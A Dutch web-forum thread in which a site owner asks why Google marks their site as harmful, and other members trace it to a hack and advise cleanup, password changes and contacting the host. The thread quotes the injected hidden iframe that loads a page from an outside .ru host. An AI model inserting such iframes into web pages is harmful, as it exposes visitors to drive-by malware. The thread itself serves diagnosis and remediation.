google beoordeeld website als onveilig !!

Status
Niet open voor verdere reacties.

euromagnet

Gebruiker
Lid geworden
5 okt 2005
Al ruim een jaar is mijn website : http://www.team-terminal.nl/ reeds in de lucht.
Deze website heb ik destijds op verzoek van mijn baas gemaakt.
Wanneer ik nu via google de website wil benaderen, geeft google de melding:

"Deze site kan schade toebrengen aan uw computer."

Dit is sinds kort van toepassing, terwijl ik niets speciaals aan mijn website heb veranderd.
Heeft iemand een idee hoe ik hieraan kom......en liever hoe ik hier weer vanaf kom ??

Vanaf zul je er moeilijk komen... Kijk eerst alle scripts na. Staat er ergens iets wat er niet in thuis hoort dan zoals een onbekend iframe dan is er iets mis met de beveiliging. Zie het volgende topic van phphulp voor meer info: http://www.phphulp.nl/forum/showtopic.php?id=65737&cat=1&replies=0

EDIT: ik zie het al:

<iframe width=289 height=337 src="http://agefree.ru:8080/index.php" >

Laatst bewerkt:
Deze site lijkt gehacked, er zitten verborgen iframes in met "agefree.ru :8080"
Loop alle pagina's maar eens na op dit soort ongenoegen......

Die melding krijg je niet van Google, ik krijg hem namelijk ook als ik hem direct open.

Waarschijnlijk wordt dat dus rechtstreeks door Mozilla gerapporteerd (tenminste, door de browser, in mijn geval FF).

[EDIT]
Als ik doorklik naar de reden krijg ik wel een Google pagina... dus nu weet ik het ook niet meer zeker. In IE7 opent de pagina overigens wel.
[/EDIT]

Laatst bewerkt:
Firefox en Google gebruiken allebei de gegevens van stopbadware.
Behalve het opschonen van je site, zoals al gezegd door anderen, moet je er ook achter komen hoe ze de site hebben kunnen hacken. Anders schoon je 't op en is 't in 'n vloek en 'n zucht weer besmet.
Controleer je computer op malware. (Ik durf niet meer te zeggen hoe je dat moet doen, want ik werk al te lang niet meer met Windows, dan geef ik verouderde info).
Verander de wachtwoorden die je gebruikt om je site te benaderen.
Meldt 't ook aan je hoster. 't Zou ook kunnen dat er bij je hoster wat mis is gegaan wat betreft beveiliging. 'n Goede hoster is dankbaar als je dit meldt!

Als je zeker weet dat je computer schoon is en je je wachtwoorden hebt veranderd, kun je alles opnieuw uploaden.
Daarna kun je via Google Webmasterhulpprogramma's 'n verzoek tot heroverweging indienen. Maar dat heeft dus pas nut als 't probleem is opgelost.

Bedankt voor de reactie.
Ik heb inderdaad deze regel in mijn codes gevonden :

<iframe width=289 height=337 src="http://agefree.ru:8080/index.php" >

Ik heb heel de website nagelopen en ik kom hem alleen tegen op mijn indexpagina.
Uiteraard heb ik dit verwijderd uit deze indexpagina en deze pagina weer ge-update.

Hoe dit erop is gekomen is een raadsel voor mij. Ik heb inmiddels mijn computer vele malen met diverse programma's laten doorzoeken op mogelijke spyware/malware. Daar komen geen besmettingen mee aan het licht.

Ik zal het nog even enige dagen aankijken......dan kan ik wellicht bij google een heroverweging aanvragen.

En het is absoluut nodig dat je je toegangscode wijzigt. Op een of andere manier is jouw toegangscode in andere handen gekomen. Of dat nu via jouw computer is gegaan, via de hoster of dat - bij wijze van spreke - de buurvrouw door 't sleutelgat heeft gegluurd.

Gisteravond heb ik alles gecontroleerd....het "vuil" verwijderd en de schone startpagina van mijn website (want daar zat alleen het vuiltje in verwerkt) weer ge-upload.
Toen ik hedenochtend op mijn werk arriveerde zag ik dat de indexpagina snachts om 05.30 uur weer was aangepast.Dus extern heeft iemand aan mijn startpagina "gewerkt".
Na het downloaden (vanaf de server) bleek inderdaad het zelfde "vuil" er weer op te staan.
Direct heb ik contact opgenomen met de "host" van mijn website. Deze behulpzame helpdesk kwam ook tot de conclusie dat er was "ingebroken" op de website. Zij hebben direct een nieuwe toegangscode aangemaakt. Tevens hebben zij de gehele website verder gecontroleerd op besmettingen, doch alles bleek verder "schoon" te zijn.

Nu maar hopen dat de problematiek verder achterwege blijft.

Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan